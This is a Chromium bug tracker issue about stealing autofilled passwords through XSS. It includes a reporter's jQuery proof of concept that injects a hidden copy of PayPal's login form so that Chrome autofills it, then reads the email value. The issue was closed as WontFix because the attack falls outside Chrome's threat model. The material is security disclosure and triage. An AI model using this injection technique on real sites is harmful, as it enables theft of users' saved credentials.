New issue
Advanced search Search tips

Issue 659953 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Oct 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Autofilled passwords can be stolen via XSS attacks

Reported by m.mach...@gmail.com, Oct 27 2016 

VULNERABILITY DETAILS
1. Save email and password on any website like a paypal ? 

2. Find possible to put xss script  in any website 

3. Put a code sample with jQuery. ( this is work on paypal but we can create always clean javascript code ) ( In this case you can add it in console f12 ) 

3.a. Google chrome treat it like a normal login website  becuase it is the same host, form and path then automatically fill it  (login section form is hidden ) 

3.b Firstly we create event who check on email / password fill then in setInterval it is create after 100 ms  login form in the same html path as normal login path.

4. Result of bug it is alert with your filled email or password if you want .

5. Solution -> Chrome should always ask if you want to fill your form 


VERSION
Chrome Version: 54.0.2840.71 m
Operating System: Windows 10


REPRODUCTION CASE

 $(document).on('change',"#email",function(){
	alert(this.value);
})
(setInterval(`
$('body').append('<section style="display:none" id="login" class="login" data-role="page" data-title="Zaloguj się do swojego konta PayPal"><div class="corral"><div id="content" class="contentContainer"><header><p class="paypal-logo paypal-logo-long">PayPal</p></header><h1 class="headerText accessAid">Zaloguj się do swojego konta PayPal</h1><form action="/signin" method="post" class="proceed maskable" name="login" autocomplete="off" novalidate=""><input type="hidden" id="token" name="_csrf" value="56UVcx7XQUBX+LrtWxREVn+nkIhaqPLhVPpEI="><input type="hidden" name="locale.x" value="pl_PL"><input type="hidden" name="processSignin" value="main"><div id="passwordSection" class="clearfix"><div class="textInput" id="login_emaildiv"><div class="fieldWrapper"><label for="email" class="fieldLabel">Adres e-mail</label><input id="email" name="login_email" type="email" class="hasHelp  validateEmpty  " required="required" aria-required="true" value="" autocomplete="off" placeholder="Adres e-mail"></div><div class="errorMessage" id="emailErrorMessage"><p class="emptyError hide">Wymagane</p><p class="invalidError hide">Wprowadź prawidłowy adres e-mail.</p></div></div><div class="textInput lastInputField" id="login_passworddiv"><div class="fieldWrapper"><label for="password" class="fieldLabel">Hasło</label><input id="password" name="login_password" type="password" class="hasHelp  validateEmpty  " required="required" aria-required="true" value="" placeholder="Hasło"></div><div class="errorMessage" id="passwordErrorMessage"><p class="emptyError hide">Wymagane</p></div></div></div><div class="actions actionsSpaced"><button class="button actionContinue" type="submit" id="btnLogin" name="btnLogin" value="Login">Zaloguj się</button></div><div class="forgotLink"><a href="/authflow/password-recovery/?country.x=PL&amp;locale.x=pl_PL" id="forgotPasswordModal" class="scTrack:unifiedlogin-click-forgot-password">Masz problem z zalogowaniem się?</a><div class="pwr-modal forgotPasswordModal" id="password-recovery-modal" aria-label="Password Recovery"><iframe id="pwdIframe" data-src="/authflow/password-recovery/?country.x=PL&amp;locale.x=pl_PL" scrolling="no" data-auto-reload="true" data-tabindex="0"></iframe><div class="monogram-small"></div></div></div></form><a href="/pl/webapps/mpp/account-selection" class="button secondary" id="createAccount">Utwórz konto</a></div></div><footer class="footer footerStayPut" role="contentinfo"><div class="extendedContent"><ul class="footerGroup footerGroupWithSiblings"><li><a href="/pl/webapps/mpp/ua/privacy-full">Ochrona danych</a></li><li><a href="/pl">PayPal</a></li></ul><p class="footerCopyright">Copyright © 1999-2016 PayPal. Wszelkie prawa zastrzeżone.</p></div></footer></section>')
`,100))
Untitled.png
993 KB View Download

Comment 1 by elawrence@chromium.org, Oct 27 2016

Components: UI>Browser>Passwords
Summary: Security: Autofilled passwords can be stolen via XSS attacks (was: Security: Autofill google chrome)
The reproduction steps here appear to call for the user to perform a script-injection attack against themselves using the Developer Tools. This is explicitly outside of Chrome's threat model (see https://www.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-).

More broadly, the reader could imagine that an XSS vulnerability exists on a target website, and the malicious information stealing script could be placed using an exploit of such a vulnerability. This is true, but not especially interesting, insofar as a XSS vulnerability on any site is inherently powerful-- it can steal the user's login tokens, monitor all of their keystrokes, or (as noted here) collect credentials either manually or by watching for form autofills.

One proposal which would limit the impact of an XSS exploit is the introduction of "Write Only" form fields (https://mikewest.github.io/credentialmanagement/writeonly/) but these would not preclude any of the myriad other attacks that could be conducted against a website vulnerable to XSS.

Comment 2 by ta...@google.com, Oct 31 2016

Status: WontFix (was: Unconfirmed)
Thanks elawrence@, I'll change this to wontfix. I wonder if we should change this to a feature request or something similar.
Project Member

Comment 3 by sheriffbot@chromium.org, Feb 7 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment